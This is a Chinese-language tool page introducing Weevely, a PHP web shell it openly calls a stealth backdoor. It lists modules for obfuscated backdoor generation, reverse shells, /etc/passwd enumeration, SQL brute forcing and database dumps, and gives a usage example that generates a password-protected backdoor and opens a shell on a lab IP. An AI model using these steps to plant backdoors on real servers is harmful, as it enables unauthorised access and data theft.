Weevely 介绍

Weevely是一个隐蔽的PHP网页脚本,模拟类似telnet的连接,是Web应用程序开发后的一个重要工具,并且可以用作隐形后门或作为网络的脚本,以管理合法的网络账户,甚至免费托管的。

资料来源:https://github.com/epinna/Weevely/
Weevely 首页
Weevely 源代码版本库

包含在weevely里的工具

weevely - 隐形的小网站脚本
root@kali:~# weevely help
+--------------------+-----------------------------------------------------+
    generator        | description              
+--------------------+-----------------------------------------------------+
  :generate.img      | Backdoor existing image and create related .htaccess
  :generate.htaccess | Generate backdoored .htaccess                        
  :generate.php      | Generate obfuscated PHP backdoor                    
+--------------------+-----------------------------------------------------+
+--------------------+-----------------------------------------------------+
  module             | description                          
+--------------------+-----------------------------------------------------+
:audit.systemfiles   | Find wrong system files permissions          
:audit.userfiles     | Guess files with wrong permissions in users home folders    
:audit.mapwebfiles   | Crawl and enumerate web folders files permissions        
:audit.phpconf       | Check php security configurations                  
:audit.etcpasswd     | Enumerate users and /etc/passwd content            
:shell.sh            | Execute system shell command                        
:shell.php           | Execute PHP statement                            
:system.info         | Collect system informations                        
:find.name           | Find files with matching name                      
:find.perms          | Find files with write, read, execute permissions  
:find.suidsgid       | Find files with superuser flags    
:backdoor.reversetcp | Send reverse TCP shell        
:backdoor.tcp        | Open a shell on TCP port        
:bruteforce.sql      | Bruteforce SQL username          
:bruteforce.sqlusers | Bruteforce all SQL users        
:file.read           | Read remote file                
:file.webdownload    | Download web URL to remote filesystem  
:file.mount          | Mount remote filesystem using HTTPfs  
:file.enum           | Enumerate remote paths                  
:file.upload2web     | Upload binary/ascii file into remote web folders and guess
                        corresponding url
:file.check          | Check remote files type, md5 and permission  
:file.rm             | Remove remote files and folders
:file.ls             | List directory contents  
:file.touch          | Change file timestamps  
:file.download       | Download binary/ascii files from the remote filesystem
:file.upload         | Upload binary/ascii file into remote filesystem
:file.edit           | Edit remote file
:sql.console         | Run SQL console or execute single queries
:sql.dump            | Get SQL database dump  
:net.ifaces          | Print interfaces addresses
:net.proxy           | Install and run Proxy to tunnel traffic through target
:net.phpproxy        | Install remote PHP proxy
:net.scan            | Port scan open TCP ports  
+--------------------+-----------------------------------------------------+

Hint: Run ":help <module>" to print detailed usage informations.

weevely 用法示例

生成一个PHP后门(generate)与指定的密码(s3cr3t)的保护。

root@kali:~# weevely generate s3cr3t
[generate.php] Backdoor file 'weevely.php' created with password 's3cr3t'

root@kali:~# weevely http://192.168.1.202/weevely.php s3cr3t

      ________                     __
     |  |  |  |----.----.-.--.----'  |--.--.
     |  |  |  | -__| -__| |  | -__|  |  |  |
     |________|____|____|___/|____|__|___  | v1.1
                                     |_____|
              Stealth tiny web shell
[+] Browse filesystem, execute commands or list available modules with ':help'
[+] Current session: 'sessions/192.168.1.202/weevely.session'

www-data@kali:/var/www $ uname
Linux

www-data@kali:/var/www $ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)